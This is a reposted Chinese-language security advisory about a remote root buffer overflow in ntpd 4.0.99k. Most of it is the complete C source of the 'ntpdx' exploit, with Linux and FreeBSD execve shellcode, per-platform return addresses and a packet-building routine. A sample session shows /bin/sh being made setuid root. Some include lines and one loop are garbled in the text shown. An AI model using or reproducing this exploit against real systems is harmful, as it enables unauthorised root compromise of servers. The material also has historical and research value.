NTPD 缓冲区溢出漏洞

/ns/ld/unix/data/20010414060758.htm

涉及程序:
NTPD

描述:
通过 NTPD 缓冲区溢出取得系统特权漏洞

详细:
发现 Network Time Protocol Daemon (ntpd) 存在缓冲区溢出漏洞,攻击者利用此漏洞能取得超级用户特权。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


* Example of use on generic RedHat 7.0 box:
*
* [venglin@cipsko venglin]$ cat dupa.c
* main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
* [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
* [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
* [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
* ntpdx v1.0 by venglin@freebsd.lublin.pl
*
* Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
*
* RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
* [1] <- evil query (pkt = 512 | shell = 45)
* [2] <- null query (pkt = 12)
* Done.
* /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash
* -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash
*
*/


#include
#include
#include
#include
#include
#include
#include
#include
#include
#include


#define NOP 0x90
#define ADDRS 8
#define PKTSIZ 512


static char usage[] = "usage: ntpdx [-o offset] <-t type> ";


/* generic execve() shellcodes */


char lin_execve[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";


char bsd_execve[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";


struct platforms
{
char *os;
char *version;
char *code;
long ret;
int align;
int shalign;
int port;
};


/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet
* *after* RET address. This values will vary from platform to platform.
*/


struct platforms targ[] =
{
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff8bc, 200, 220, 0 },


{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff540, 200, 220, 0 },


{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
0xbffff777, 240, 160, 0 },


{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};


long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;


if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}


return ip;
}


int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
/* tcpdump-based reverse engineering :)) */


char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
0x74, 0x75, 0x6d, 0x3d };


char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };


char buf[PKTSIZ], *p;
long *ap;
int i;


int sockfd;
struct sockaddr_in sa;


bzero(&sa, sizeof(sa));


sa.sin_family = AF_INET;
sa.sin_port = htons(123);
sa.sin_addr.s_addr = getip(host);


if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
return -1;
}


if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
{
perror("connect");
close(sockfd);
return -1;
}


memset(buf, NOP, PKTSIZ);
memcpy(buf, q2, sizeof(q2));


p = buf + align;
ap = (unsigned long *)p;


for(i=0;i *ap++ = ret;


p = (char *)ap;


memcpy(buf+shalign, shellcode, strlen(shellcode));


if((write(sockfd, buf, PKTSIZ)) < 0)
{
perror("write");
close(sockfd);
return -1;
}


fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
strlen(shellcode));
fflush(stderr);


if ((write(sockfd, q3, sizeof(q3))) < 0)
{
perror("write");
close(sockfd);
return -1;
}


fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
fflush(stderr);


close(sockfd);


return 0;
}


int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, ofs, i;
long ret;


opterr = ofs = 0;
type = -1;


while ((ch = getopt(argc, argv, "t:o:")) != -1)
switch((char)ch)
{
case 't':
type = atoi(optarg);
break;


case 'o':
ofs = atoi(optarg);
break;


case '?':
default:
puts(usage);
exit(0);


}


argc -= optind;
argv += optind;


fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n");


if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
targ[i].os, targ[i].version, (void *)targ[i].ret);
}


exit(0);
}


fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
targ[type].os, targ[type].version);


ret = targ[type].ret;
ret += ofs;


if (argc != 1)
{
puts(usage);
exit(0);
}


fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
(void *)ret, targ[type].align, targ[type].shalign);


if (doquery(*argv, ret, targ[type].code, targ[type].align,
targ[type].shalign) < 0)
{
fprintf(stderr, "Failed.\n");
exit(1);
}


fprintf(stderr, "Done.\n");


if (!targ[type].port)
{
fprintf(stderr, "/tmp/sh was spawned.\n");
exit(0);
}


exit(0);
}

受影响系统:
NTPD



转自绿色兵团